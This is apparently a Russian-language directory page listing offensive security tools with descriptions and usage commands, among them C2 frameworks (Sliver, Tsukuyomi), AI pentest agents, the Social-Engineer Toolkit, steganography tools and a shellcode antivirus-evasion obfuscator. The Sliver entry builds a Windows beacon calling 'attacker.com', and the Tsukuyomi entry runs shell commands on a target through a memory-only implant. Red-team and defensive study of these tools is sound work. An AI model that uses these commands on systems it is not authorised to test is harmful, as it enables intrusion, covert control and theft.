Exploitation

105 инструментов

Shannon

Exploitation

Автономный white-box AI-пентестер для веб-приложений и API, который анализирует исходный код, выявляет векторы атак и выполняет реальные эксплойты для подтверждения уязвимостей перед продакшеном.

npx @keygraph/shannon setup npx @keygraph/shannon start -u https://your-app.com -r /path/to/your-repo

ShieldGrid

vlatest
Exploitation

Фреймворк для симуляции сетевого сканирования, lateral movement и злоупотребления протоколами в среде тестирования безопасности.

—

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell
Exploitation

SET — комплексный фреймворк для атак социальной инженерии. Включает Spear-Phishing, веб-атаки (credential harvesting, tabnabbing), создание вредоносных payload-ов, SMS-спуфинг и QR-код атаки. Входит в Kali Linux.

# Kali Linux (предустановлен): sudo setoolkit # Установка из исходников: git clone https://github.com/trustedsec/social-engineer-toolkit cd social-engineer-toolkit pip3 install -r requirements.txt sudo python3 setoolkit

Steghide

Exploitation

Классический инструмент для скрытия данных в изображениях и аудиофайлах (JPEG, BMP, WAV, AU). Использует шифрование AES-128. Поддерживает извлечение скрытых данных. Широко используется в CTF и изучении стеганографии.

# Kali Linux / Ubuntu: sudo apt install steghide # Скрыть файл в изображении: steghide embed -cf cover.jpg -sf secret.txt steghide embed -cf cover.jpg -sf secret.txt -p "password" # Извлечь: steghide extract -sf cover.jpg steghide extract -sf cover.jpg -p "password" # Получить информацию без пароля: steghide info cover.jpg

Stegseek

v0.6
Exploitation

Молниеносный брутфорс паролей для Steghide: проверяет 1+ млрд слов в секунду благодаря многопоточности и ранней обрезке неверных путей. Умеет автоматически извлекать данные без указания пароля при успешном взломе. …

# Скачать .deb-пакет: # https://github.com/RickdeJager/stegseek/releases sudo dpkg -i stegseek_*.deb # Или из исходников: git clone https://github.com/RickdeJager/stegseek cd stegseek && mkdir build && cd build cmake .. && make && sudo make install # Брутфорс с wordlist (синтаксис: stegseek [файл] [wordlist] [вывод]): stegseek cover.jpg /usr/share/wordlists/rockyou.txt stegseek cover.jpg rockyou.txt extracted.txt # Только проверка (без извлечения): stegseek --info cover.jpg

Stegsolve

Exploitation

GUI-инструмент для визуального анализа стеганографии в изображениях: просмотр отдельных битовых плоскостей (R/G/B/Alpha), XOR между изображениями, стереоанализ, Frame browser для GIF. Классический инструмент для CTF-задач на стего.

# Требуется Java: # Скачать JAR: # https://github.com/eugenekolo/sec-tools/raw/master/stego/stegsolve/stegsolve/Stegsolve.jar wget "https://github.com/eugenekolo/sec-tools/raw/master/stego/stegsolve/stegsolve/Stegsolve.jar" java -jar Stegsolve.jar # Или скомпилировать: git clone https://github.com/zardus/ctf-tools cd ctf-tools/stegsolve && make

Strix

Exploitation

Автономные AI-агенты для пентестинга, которые динамически запускают код, находят уязвимости и подтверждают их работающими proof-of-concept эксплойтами, интегрируясь в CI/CD пайплайны.

curl -sSL https://strix.ai/install | bash

T3MP3ST

Exploitation

Открытый мультиагентный оркестратор для наступательной безопасности, координирующий несколько AI-агентов через восьмиэтапную цепочку операций для автономной разведки, эксплуатации и подготовки отчётов в рамках red-team автоматизации.

npm install npm run server

TTPForge

v1.5.0
Exploitation

Фреймворк для описания, автоматизации и выполнения тактик и техник, согласованных с MITRE ATT&CK.

curl \ https://raw.githubusercontent.com/facebookincubator/TTPForge/main/dl-rl.sh \ | bash export PATH=$HOME/.local/bin:$PATH ttpforge init ttpforge list repos ttpforge list ttps ttpforge show ttp examples//args/basic.yaml ttpforge run examples//args/basic.yaml \ --arg str_to_print=hello \ --arg run_second_step=true

Tsukuyomi

v0.4.2
Exploitation

C2-фреймворк на Rust для Linux x86_64 и Windows x86_64. Реализует staged-доставку: стейджер (Mikazuki) выходит на связь по HTTPS, замещает себя в памяти полным имплантом (Mangetsu), который берёт на …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Tsukuyomi.git cd Tsukuyomi cargo build --release # Запуск (однобинарный лаунчер: поднимает сервер + консоль) ./target/release/tsukuyomi # В консольном REPL: # build stager -- компилирует стейджер (Linux + Windows), запрашивает URL C2 # build implant -- компилирует имплант (Linux + Windows) # build all -- стейджер + имплант # sessions -- список активных сессий # interact 1 -- подключиться к сессии #1 # shell id=1 whoami -- выполнить команду на цели # Схема: стейджер → HTTPS → сервер → замена в памяти → имплант # Имплант остаётся только в RAM; TLS-пиннинг бакается при сборке

UniByAv

Exploitation

Простой обфускатор shellcode: генерирует исполняемый файл, дружественный к антивирусам, из сырого shellcode. Процедура обфускации написана на ассемблере — генерируется 32-битный XOR-ключ, который брутфорсится и расшифровывается прямо во время …

git clone https://git.toolsofthetrade.qzz.io/recovered/unibyav.git cd unibyav # Требуется cygwin/MinGW toolchain на Windows для компиляции итогового .exe python UniByAv4.2.py shellcode.bin output.exe /path/to/MinGW/bin/